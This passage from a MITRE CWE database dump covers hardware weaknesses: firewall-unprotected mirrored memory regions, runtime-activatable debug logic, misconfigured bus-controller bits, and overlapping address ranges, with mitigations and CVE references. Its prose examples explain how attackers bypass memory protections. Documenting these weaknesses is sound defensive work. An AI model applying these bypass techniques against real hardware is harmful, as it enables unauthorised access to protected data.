"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control"
]
}
] |
[
{
"Description": "The fabric firewall should apply the same protections as the original region to the mirrored regions.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "The fabric firewall should apply the same protections as the original region to the mirrored regions.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"456",
"679"
] |
[
{
"Authors": [
"Taku Izumi, Fujitsu Limited"
],
"Edition": null,
"ExternalReferenceID": "REF-1134",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "Address Range Memory Mirroring",
"URL": "https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-06-01",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Dynamic Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC). The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The firewall only protects the original range but not the mirrored regions.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to \"10\" and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Firewall should protect mirrored regions.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1312"
]
] |
[] |
1313
|
Hardware Allows Activation of Test or Debug Logic at Runtime
|
Base
|
Simple
|
Draft
|
During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary.
|
An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
},
{
"Note": "Such issues could be introduced during integration and identified later during Testing or System configuration phases.",
"Phase": "Integration"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Crash, Exit, or Restart",
"DoS: Instability",
"DoS: Resource Consumption (CPU)",
"DoS: Resource Consumption (Memory)",
"DoS: Resource Consumption (Other)",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Alter Execution Logic",
"Quality Degradation",
"Unexpected State",
"Reduce Performance",
"Reduce Reliability"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Integration"
],
"Strategy": null
}
] |
[
{
"Description": "Hardware processor allows activation of test or debug logic at runtime.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-33150",
"Reference": "CVE-2021-33150"
},
{
"Description": "Processor allows the activation of test or debug logic at runtime, allowing escalation of privileges",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-0146",
"Reference": "CVE-2021-0146"
}
] | null | null |
[
"121"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-08-06",
"SubmissionName": "Brent Sherman",
"SubmissionOrganization": "Accellera IP Security Assurance (IPSA) Working Group",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "contributed to observed example",
"ContributionDate": "2023-06-21",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"1313"
]
] |
[] |
1315
|
Improper Setting of Bus Controlling Capability in Fabric End-point
|
Base
|
Simple
|
Incomplete
|
The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.
|
To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "System Configuration"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"System Configuration"
],
"Strategy": null
}
] | null | null | null |
[
"1",
"180"
] |
[
{
"Authors": [
"Benoit Morgan, Eric Alata, Vincent Nicomette, Mohamed Kaaniche"
],
"Edition": null,
"ExternalReferenceID": "REF-1135",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "Bypassing IOMMU Protection against I/O Attacks",
"URL": "https://hal.archives-ouvertes.fr/hal-01419962/document",
"URLDate": null
},
{
"Authors": [
"Colin L. Rothwell"
],
"Edition": null,
"ExternalReferenceID": "REF-1136",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "Exploitation from malicious PCI Express peripherals",
"URL": "https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-934.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-19",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit (\"PMIC\"), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0. There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1315"
]
] |
[] |
1316
|
Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges
|
Base
|
Simple
|
Draft
|
The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.
|
Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected.
Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Bus/Interface Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism",
"Read Memory",
"Modify Memory"
],
"Likelihood": [
"Medium"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control",
"Authorization"
]
}
] |
[
{
"Description": "When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Validate mitigation actions with robust testing.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
}
] |
[
{
"Description": "Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2009-4419",
"Reference": "CVE-2009-4419"
}
] | null | null |
[
"456",
"679"
] |
[
{
"Authors": [
"Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides, Mikhail Gorobets"
],
"Edition": null,
"ExternalReferenceID": "REF-1137",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2017",
"Publisher": null,
"Section": null,
"Title": "BARing the System - New vulnerabilities in Coreboot & UEFI-based Systems",
"URL": "https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf",
"URLDate": null
}
] |
[
{
"Note": "As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-06-01",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
